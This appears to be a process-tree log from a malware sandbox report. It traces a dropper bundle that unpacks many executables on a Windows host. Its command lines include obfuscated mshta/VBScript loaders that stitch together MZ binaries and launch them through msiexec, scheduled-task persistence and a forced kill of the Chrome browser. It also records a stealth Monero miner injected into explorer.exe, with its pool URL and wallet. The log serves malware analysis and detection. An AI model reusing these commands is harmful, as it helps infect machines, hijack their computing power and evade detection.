C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1612,16638404329082477390,7009038556646890517,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9140_342681518" --mojo-platform-channel-handle=2180 /prefetch:87⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1612,16638404329082477390,7009038556646890517,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9140_342681518" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2568 /prefetch:17⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1612,16638404329082477390,7009038556646890517,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9140_342681518" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2592 /prefetch:17⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1612,16638404329082477390,7009038556646890517,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9140_342681518" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3224 /prefetch:27⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,16638404329082477390,7009038556646890517,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9140_342681518" --mojo-platform-channel-handle=3256 /prefetch:87⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,16638404329082477390,7009038556646890517,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9140_342681518" --mojo-platform-channel-handle=3632 /prefetch:87⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,16638404329082477390,7009038556646890517,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9140_342681518" --mojo-platform-channel-handle=3436 /prefetch:87⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,16638404329082477390,7009038556646890517,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9140_342681518" --mojo-platform-channel-handle=3268 /prefetch:87⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1612,16638404329082477390,7009038556646890517,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9140_342681518" --mojo-platform-channel-handle=2632 /prefetch:87⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,16638404329082477390,7009038556646890517,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9140_342681518" --mojo-platform-channel-handle=3580 /prefetch:87⤵
-
C:\Users\Admin\Pictures\Adobe Films\Gr7giyafFxvtrxqsfPA4BlU8.exe"C:\Users\Admin\Pictures\Adobe Films\Gr7giyafFxvtrxqsfPA4BlU8.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\Gr7giyafFxvtrxqsfPA4BlU8.exe"C:\Users\Admin\Pictures\Adobe Films\Gr7giyafFxvtrxqsfPA4BlU8.exe" -u5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScript: cLOSE( CREatEObJEcT ( "WSCRIpt.ShELL"). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed094c47c32b.exe"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF """"=="""" for %L IN (""C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed094c47c32b.exe"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe))1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed094c47c32b.exe" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""=="" for %L IN ("C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed094c47c32b.exe") do taskkill -f -im "%~nxL"2⤵
-
C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exEXYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF3⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScript: cLOSE( CREatEObJEcT ( "WSCRIpt.ShELL"). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""/Pgxf5hQhM5tF ""=="""" for %L IN (""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe))4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF "/Pgxf5hQhM5tF "=="" for %L IN ("C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE") do taskkill -f -im "%~nxL"5⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCriPt:closE ( CrEaTeoBJecT ("WsCRiPT.ShEll" ). RuN( "cmd /R EcHO | SEt /p = ""MZ"" > OsuKT1.9t & cOPY /B /y OsuKT1.9t+XRB2l6FD.IlF +9Odf.6 PEQqN6S.Ou & STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t ", 0 , True ))4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R EcHO | SEt /p = "MZ" > OsuKT1.9t & cOPY /B /y OsuKT1.9t+XRB2l6FD.IlF+9Odf.6 PEQqN6S.Ou &STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>OsuKT1.9t"6⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\PEQQN6S.OU6⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im "Wed094c47c32b.exe"3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-U85DD.tmp\Wed09d27135e5a8b3b.tmp"C:\Users\Admin\AppData\Local\Temp\is-U85DD.tmp\Wed09d27135e5a8b3b.tmp" /SL5="$50056,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09d27135e5a8b3b.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09d27135e5a8b3b.exe"C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09d27135e5a8b3b.exe" /SILENT2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-KCURF.tmp\Wed09d27135e5a8b3b.tmp"C:\Users\Admin\AppData\Local\Temp\is-KCURF.tmp\Wed09d27135e5a8b3b.tmp" /SL5="$10212,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09d27135e5a8b3b.exe" /SILENT3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-PVPD4.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-PVPD4.tmp\postback.exe" ss14⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09abf83d9c2.exeWed09abf83d9c2.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09abf83d9c2.exe"C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09abf83d9c2.exe" -u2⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed0901eb1dae126e32.exeC:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed0901eb1dae126e32.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed0971f17486f8.exeC:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed0971f17486f8.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed0901eb1dae126e32.exeC:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed0901eb1dae126e32.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09db0d52c38.exeWed09db0d52c38.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe3⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09d27135e5a8b3b.exeWed09d27135e5a8b3b.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed096a1bff61.exeWed096a1bff61.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\1405251.exe"C:\Users\Admin\AppData\Roaming\1405251.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\7954272.exe"C:\Users\Admin\AppData\Roaming\7954272.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\6640402.exe"C:\Users\Admin\AppData\Roaming\6640402.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\2003872.exe"C:\Users\Admin\AppData\Roaming\2003872.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\7563236.exe"C:\Users\Admin\AppData\Roaming\7563236.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\14498.exe"C:\Users\Admin\AppData\Roaming\14498.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\4965181.exe"C:\Users\Admin\AppData\Roaming\4965181.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1976 -s 15204⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"3⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"5⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"9⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"6⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 8084⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 7924⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 1884⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 8364⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\wangting-game.exe"C:\Users\Admin\AppData\Local\Temp\wangting-game.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=14⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"5⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\10.exe"C:\Users\Admin\AppData\Local\Temp\10.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1360 -s 15004⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"3⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"4⤵
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"5⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"6⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe6⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"7⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"9⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth8⤵
- Executes dropped EXE
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding B233CA9D9E63B1B2AA5F57E8CEEB897E C2⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding EEB56DA4FA4418A02AC3EC0A611A4A802⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 47744398A8AFD8B79546DA2553027607 E Global\MSI00002⤵
- Blocklisted process makes network request
- Executes dropped EXE
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Modifies registry class
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
